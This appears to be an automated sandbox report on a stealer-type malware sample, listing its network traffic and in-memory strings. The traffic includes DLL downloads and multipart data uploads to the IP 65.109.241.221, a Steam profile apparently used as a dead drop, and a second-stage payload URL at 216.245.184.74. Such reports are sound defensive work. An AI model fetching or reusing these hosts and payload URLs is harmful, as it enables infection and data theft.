                    Source: global traffic | HTTP traffic detected: GET /sqlt.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDA | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 829 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KKFBFCAFCBKFIEBFHIDB | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EHDGIJJDGCBKFIDHIEBK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIE | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 1145 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CGIJJKEHCAKEGCAKJKEC | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AAEHDAAKEHJECBFHCBKF | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AFIIIIJKFCAAECAKFIEH | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 469 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 130441 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EHDGIJJDGCBKFIDHIEBK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CGDGIJKFIJDAAAKFHIEG | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 498 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KECBFBAEBKJJJJKFCGCB | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /webdav/Windows_Services_AS.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 216.245.184.74 | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCA | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: tea.arpdabl.org | Content-Length: 3217 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Connection: Keep-Alive | Cache-Control: no-cache | Host: survey-smiles.com
                    Source: unknown | TCP traffic detected without corresponding DNS query: 65.109.241.221
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Code function: 11_2_0009279E InternetReadFile,InternetQueryDataAvailable,InternetReadFile,11_2_0009279E
                    Source: global traffic | HTTP traffic detected: GET /profiles/76561199735694209 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /sqlt.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /softokn3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET /webdav/Windows_Services_AS.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 216.245.184.74 | Cache-Control: no-cache
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Connection: Keep-Alive | Cache-Control: no-cache | Host: survey-smiles.com
                    Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                    Source: global traffic | DNS traffic detected: DNS query: mwDBbeizpqpEEPNlGvI.mwDBbeizpqpEEPNlGvI
                    Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                    Source: global traffic | DNS traffic detected: DNS query: tea.arpdabl.org
                    Source: global traffic | DNS traffic detected: DNS query: survey-smiles.com
                    Source: global traffic | DNS traffic detected: DNS query: sJavUoBfFUhkoScDaBgelALGvfC.sJavUoBfFUhkoScDaBgelALGvfC
                    Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                    Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: 65.109.241.221 | Content-Length: 279 | Connection: Keep-Alive | Cache-Control: no-cache
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://216.245.184.74/webdav/Windows_Services_AS.exe
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://216.245.184.74/webdav/Windows_Services_AS.exe-data;
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://216.245.184.74/webdav/Windows_Services_AS.exe1kkkkken
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: mg9LPWGtPB.exe | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                    Source: mg9LPWGtPB.exe | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.dr | String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
                    Source: mg9LPWGtPB.exe | String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                    Source: mg9LPWGtPB.exe | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                    Source: mg9LPWGtPB.exe | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                    Source: mg9LPWGtPB.exe | String found in binary or memory: http://crl.globalsign.com/root.crl0G
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.dr | String found in binary or memory: http://crl.globalsign.net/root.crl0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: mg9LPWGtPB.exe, EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://ocsp.digicert.com0
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://ocsp.digicert.com0A
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://ocsp.digicert.com0C
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://ocsp.digicert.com0N
                    Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, EHIJJDGDHD.exe.11.dr, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, Windows_Services_AS[1].exe.11.dr, mozglue.dll.11.dr | String found in binary or memory: http://ocsp.digicert.com0X
                    Source: mg9LPWGtPB.exe | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                    Source: mg9LPWGtPB.exe | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                    Source: mg9LPWGtPB.exe | String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                    Source: mg9LPWGtPB.exe | String found in binary or memory: http://ocsp.globalsign.com/rootr103
                    Source: mg9LPWGtPB.exe | String found in binary or memory: http://ocsp.globalsign.com/rootr30;
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
                    Source: mg9LPWGtPB.exe | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.dr | String found in binary or memory: http://s.symcb.com/universal-root.crl0
                    Source: EHIJJDGDHD.exe.11.dr, Windows_Services_AS[1].exe.11.drString found in binary or memory: http://s.symcd.com06
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                    Source: mg9LPWGtPB.exe, 00000000.00000003.2003742764.0000000002905000.00000004.00000020.00020000.00000000.sdmp, EHIJJDGDHD.exe, 00000010.00000003.3035364924.00000000027B8000.00000004.00000020.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3094253513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Bk.pif, 0000001D.00000003.3928833943.0000000003417000.00000004.00000020.00020000.00000000.sdmp, Knitting.0.dr, Bk.pif.17.dr, Performing.16.dr, SolarSys.pif.29.dr, Hist.pif.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                    Source: mg9LPWGtPB.exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: Hist.pif, 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, 76561199735694209[1].htm.11.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
